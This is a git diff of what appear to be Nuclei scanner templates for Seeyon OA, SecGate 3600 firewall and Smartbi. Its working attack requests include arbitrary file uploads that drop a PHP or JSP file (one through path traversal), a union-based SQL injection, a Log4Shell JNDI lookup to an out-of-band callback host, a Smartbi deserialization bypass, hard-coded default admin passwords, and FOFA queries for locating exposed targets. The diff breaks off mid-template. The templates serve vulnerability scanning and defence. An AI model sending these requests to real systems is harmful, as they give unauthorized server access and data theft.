obj_app_upfile - Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: | + There is an arbitrary file upload vulnerability in the obj_app_upfile interface of Internet SecGate 3600 firewall. An attacker can obtain server permissions by constructing a special request package. + reference: + - https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + metadata: + verified: "true" + fofa-query: 'fid="1Lh1LHi6yfkhiO83I59AYg=="' + max-request: 1 + tags: secgate,3600,firewall,file-upload,intrusive + +variables: + filename: "{{rand_base(6)}}" + string: "{{randstr}}" + file-upload: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /?g=obj_app_upfile HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{string}} + User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0) + + ------WebKitFormBoundary{{string}} + Content-Disposition: form-data; name="MAX_FILE_SIZE" + + 10000000 + ------WebKitFormBoundary{{string}} + Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php" + Content-Type: text/plain + + + + ------WebKitFormBoundary{{string}} + Content-Disposition: form-data; name="submit_post" + + obj_app_upfile + ------WebKitFormBoundary{{string}} + Content-Disposition: form-data; name="__hash__" + + 0b9d6b1ab7479ab69d9f71b05e0e9445 + ------WebKitFormBoundary{{string}}-- + + - | + GET /attachements/{{filename}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code_2 == 200 + - contains(body_2,'{{file-upload}}') + - contains(header_2,'text/html') + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml b/http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml deleted file mode 100644 index 46f2772b9e..0000000000 --- a/http/vulnerabilities/secworld/secworld-secgate-3600-firewall-upload.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: secworld-secgate-3600-firewall-upload - -info: - name: secworld-secgate-3600-firewall-upload - author: SleepingBag945 - severity: critical - description: 网神防火墙obj_app_upfile任意文件上传 - reference: - - https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html - tags: secworld - -http: - - raw: - - | - POST /?g=obj_app_upfile HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Encoding: gzip, deflate - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr_3}} - User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0) - - ------WebKitFormBoundary{{randstr_3}} - Content-Disposition: form-data; name="MAX_FILE_SIZE" - - 10000000 - ------WebKitFormBoundary{{randstr_3}} - Content-Disposition: form-data; name="upfile"; filename="{{randstr_1}}.php" - Content-Type: text/plain - - - - ------WebKitFormBoundary{{randstr_3}} - Content-Disposition: form-data; name="submit_post" - - obj_app_upfile - ------WebKitFormBoundary{{randstr_3}} - Content-Disposition: form-data; name="__hash__" - - 0b9d6b1ab7479ab69d9f71b05e0e9445 - ------WebKitFormBoundary{{randstr_3}}-- - - - | - GET /attachements/{{randstr_1}}.php HTTP/1.1 - Host: {{Hostname}} - - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 302 - - status_code_2 == 200 && contains(body_2,'{{randstr_2}}') - condition: and - - diff --git a/http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml b/http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml deleted file mode 100755 index dc15a15da5..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-ajax-unauth.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: seeyon-ajax-unauth - -info: - name: Seeyon AJAX Unauthoried Access - author: pikpikcu - severity: high - description: 接口未授权访问,可调用文件上传接口上传webshell。 - reference: - - https://buaq.net/go-53721.html - - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA - - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.html - metadata: - verified: true - fofa-query: app="致远互联-OA" - tags: misconfig,seeyon,unauth,ajax - -http: - - raw: - - | - POST /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - | - GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_1 == 200 && contains(body_1, "java.lang.NullPointerException:null")' - - 'status_code_2 == 200 && contains(body_2,"companyName")' - condition: and diff --git a/http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml new file mode 100755 index 0000000000..0ca5504a63 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml @@ -0,0 +1,35 @@ +id: seeyon-config-infoleak + +info: + name: Seeyon OA A6 config.jsp - Information Leakage + author: SleepingBag945 + severity: medium + description: | + The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20config.jsp%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + metadata: + max-request: 1 + fofa-query: body="yyoa" && app="致远互联-OA" + verified: true + tags: seeyon,oa,config,info-leak + +http: + - raw: + - | + GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "DatabaseName=" + - "请在文本框内配置传真插件所需服务器的信息" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml new file mode 100755 index 0000000000..a676712360 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml @@ -0,0 +1,39 @@ +id: seeyon-createmysql-infoleak + +info: + name: Seeyon OA A6 createMysql.jsp Database - Information Leakage + author: SleepingBag945 + severity: medium + description: | + Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL. + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md + metadata: + max-request: 1 + fofa-query: title="致远A8+协同管理软件.A6" + verified: true + tags: seeyon,oa,info-leak + +http: + - method: GET + path: + - "{{BaseURL}}/yyoa/createMysql.jsp" + - "{{BaseURL}}/yyoa/ext/createMysql.jsp" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "root
" + + - type: regex + part: body + regex: + - "[*][0-zA-Z]{40}
" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml deleted file mode 100755 index 4ff9b9b86e..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-a6-config-jsp-info-leak.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: seeyon-oa-a6-config-jsp-info-leak - -info: - name: seeyon-oa a6 config.jsp user info leak - author: SleepingBag945 - severity: medium - description: 致远OA A6 config.jsp 敏感信息泄漏 - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - tags: seeyon,oa - -http: - - raw: - - | - GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - words: - - "DatabaseName" - - type: word - words: - - "请在文本框内配置传真插件所需服务器的信息" - - type: status - status: - - 200 - -# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml deleted file mode 100755 index b9f4b3239e..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-a6-createMysql-info-leak.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: seeyon-oa-a6-createMysql-user-info-leak - -info: - name: seeyon-oa a6 createMysql user info leak - author: SleepingBag945 - severity: medium - description: 致远OA A6 createMysql.jsp 数据库敏感信息泄露 - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - tags: seeyon,oa - -http: - - raw: - - | - GET /yyoa/createMysql.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - words: - - "root
" - - type: regex - regex: - - "[*][0-zA-Z]{40}
" - - type: status - status: - - 200 - -# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml deleted file mode 100755 index dcf004ecd8..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-a6-initDataAssess-user-info-leak.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: seeyon-oa-a6_initDataAssess-user-info-leak - -info: - name: seeyon-oa a6 initDataAssess user info leak - author: SleepingBag945 - severity: medium - description: 致远OA A6 initDataAssess.jsp 用户敏感信息泄露 - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - tags: seeyon,oa - -http: - - raw: - - | - GET /yyoa/assess/js/initDataAssess.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - words: - - "personList" - - type: word - words: - - "personHash.Add" - - type: status - status: - - 200 - -# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml deleted file mode 100755 index 2f2d910417..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: seeyon-oa-a6-setextno-sqli - -info: - name: seeyon-oa a6 setextno sqli - author: SleepingBag945 - severity: high - description: 致远OA A6 setextno.jsp SQL注入漏洞 - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html - tags: seeyon,oa - -http: - - raw: - - | - GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - words: - - "请填写以下用户的传真分机号" - - type: status - status: - - 200 - -# /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4# diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml deleted file mode 100755 index 81848a215d..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: seeyon-oa-a8-default-login - -info: - name: seeyon-oa A8 default login - author: SleepingBag945 - severity: high - description: 致远(seeyon)OA A8+企业版存在弱口令漏洞,可利用该漏洞登陆后台 - tags: seeyon,oa - -http: - - raw: - - | - POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Content-Length: 75 - Accept: */* - Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - - UserAgentFrom=iphone&login_username=audit-admin&login_password=seeyon123456 - - matchers-condition: and - matchers: - - type: word - words: - - "\"LoginOK\":\"ok\"" - - type: status - status: - - 200 - -# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml b/http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml deleted file mode 100755 index 0eee7efd1c..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: seeyon-oa-a8-m-information-disclosure - -info: - name: seeyon-oa-m a8 information-disclosure - author: SleepingBag945 - severity: medium - description: 致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击,攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - tags: seeyon,oa - -http: - - raw: - - | - POST /seeyon/management/index.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - - password=WLCCYBD%40SEEYON - - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/seeyon/management/status.jsp" - - type: word - part: header - words: - - "Set-Cookie" - - type: status - status: - - 302 - -# Enhanced by cs on 2022/07/05 -# 登录后通过如下url访问敏感信息 -# /seeyon/management/status.jsp -# /seeyon/logs/login.log -# /seeyon/logs/v3x.log - diff --git a/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml index 12494f1ba2..b5e620f8a2 100755 --- a/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml +++ b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml @@ -1,13 +1,17 @@ id: seeyon-oa-fastjson-rce info: - name: seeyon-oa fastjson rce + name: Seeyon OA Fastjson Remote Code Execution author: SleepingBag945 severity: critical - description: 致远OA Fastjson 远程代码执行 reference: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - tags: seeyon,oa,rce,fastjson + - https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go + metadata: + max-request: 1 + fofa-query: app="致远互联-OA" + verified: true + tags: seeyon,oa,rce,fastjson,oast http: - raw: @@ -25,4 +29,7 @@ http: words: - "dns" -# Enhanced by cs on 2022/07/05 + - type: word + part: body + words: + - "com.alibaba.fastjson.JSONException" \ No newline at end of file diff --git a/http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml new file mode 100755 index 0000000000..5b43453ab6 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml @@ -0,0 +1,34 @@ +id: seeyon-oa-initdataassess-infoleak + +info: + name: Seeyon OA A6 initDataAssess.jsp - Information Leakage + author: SleepingBag945 + severity: medium + description: | + Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information, attacker can use the obtained username to blast the user's password to enter the background for further attacks. + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20initDataAssess.jsp%20%E7%94%A8%E6%88%B7%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md + metadata: + max-request: 1 + fofa-query: body="yyoa" && app="致远互联-OA" + verified: true + tags: seeyon,oa,info-leak + +http: + - raw: + - | + GET /yyoa/assess/js/initDataAssess.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "personList" + - "personHash.Add" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml b/http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml deleted file mode 100755 index 523efad643..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: seeyon-oa-log4jshell - -info: - name: seeyon-oa log4jshell - author: SleepingBag945 - severity: critical - description: 致远OA Log4jShell - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - tags: seeyon,oa,rce - -http: - - raw: - - | - POST /seeyon/main.do?method=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - -# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml b/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml new file mode 100755 index 0000000000..349bb5d875 --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml @@ -0,0 +1,38 @@ +id: seeyon-oa-setextno-sqli + +info: + name: Seeyon OA A6 setextno.jsp - SQL Injection + author: SleepingBag945 + severity: high + description: | + Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information,You can blast the user password through the obtained username to enter the background for further attacks + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20setextno.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: body="yyoa" && app="致远互联-OA" + verified: true + tags: seeyon,oa,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5({{num}})),4# HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml new file mode 100755 index 0000000000..82f2f6d75b --- /dev/null +++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml @@ -0,0 +1,56 @@ +id: seeyon-oa-sp2-file-upload + +info: + name: Seeyon OA wpsAssistServlet - Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: | + There is an arbitrary file upload vulnerability in the Seeyon OA wpsAssistServlet interface. Through the vulnerability, an attacker can send a specific request packet to upload malicious files and obtain server permissions. + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java + - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="致远互联-OA" && title="V8.0SP2" + verified: true + tags: seeyon,oa,file-upload,intrusive + +variables: + filename: "{{rand_base(6)}}" + string: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b + Accept-Encoding: gzip + + --59229605f98b8cf290a7b8908b34616b + Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls" + Content-Type: application/vnd.ms-excel + + <% out.println("{{string}}");%> + --59229605f98b8cf290a7b8908b34616b-- + + - | + GET /{{filename}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '"success":' + + - type: word + part: body_2 + words: + - '{{string}}' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml deleted file mode 100755 index ee2a4d0161..0000000000 --- a/http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload - -info: - name: seeyon-oa sp2 wpsAssistServlet arbitrary file upload - author: SleepingBag945 - severity: critical - description: 致远OA SP2 wpsAssistServlet 任意文件上传 - reference: - - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html - tags: seeyon,oa - -http: - - raw: - - | - GET /seeyon/wpsAssistServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - words: - - "\"data\":\"flag is empty!\"" - - type: status - status: - - 200 - -# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/smartbi/smartbi-default-user.yaml b/http/vulnerabilities/smartbi/smartbi-default-user.yaml deleted file mode 100755 index 6754c37abe..0000000000 --- a/http/vulnerabilities/smartbi/smartbi-default-user.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: smartbi-default-user - -info: - name: smartbi - Default user weakpass - author: unknown - severity: high - description: | - Smartbi default user weakpass. - reference: - - https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511 - tags: smartbi - -http: - - raw: - - | - POST /smartbi/vision/RMIServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Content-Length: 67 - - className=UserService&methodName=loginFromDB¶ms=["system","0a"] - - | - POST /vision/RMIServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Content-Length: 67 - - className=UserService&methodName=loginFromDB¶ms=["system","0a"] - matchers: - - type: word - words: - - '"result":true' - part: body \ No newline at end of file diff --git a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml new file mode 100755 index 0000000000..117851a77f --- /dev/null +++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml @@ -0,0 +1,48 @@ +id: smartbi-deserialization + +info: + name: Smartbi windowunloading Interface - Deserialization + author: SleepingBag945 + severity: high + description: | + The Smartbi big data analysis platform has a remote command execution vulnerability. An unauthenticated remote attacker can use the stub interface to construct a request to bypass patch restrictions and then control the JDBC URL, which can ultimately lead to remote code execution or information leakage. + reference: + - https://stack.chaitin.com/techblog/detail?id=122 + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-windowunloading-other.yaml + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="SMARTBI" + verified: true + tags: smartbi,deserialization + +http: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + className=UserService&methodName=isLogged¶ms=[] + + payloads: + path: + - /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 + - /vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'H~CxOm~' + + - type: word + part: header + words: + - 'text/plain' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml deleted file mode 100755 index a1c400efb5..0000000000 --- a/http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: smartbi-windowunloading-deserialization - -info: - name: smartbi - Deserialization vulnerability in the windowunloading interface - author: unknown - severity: critical - description: | - Smartbi Deserialization vulnerability in the windowunloading interface. - reference: - - https://stack.chaitin.com/techblog/detail?id=122 - tags: smartbi - -http: - - raw: - - | - POST /vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - className=UserService&methodName=isLogged¶ms=[] - - | - POST 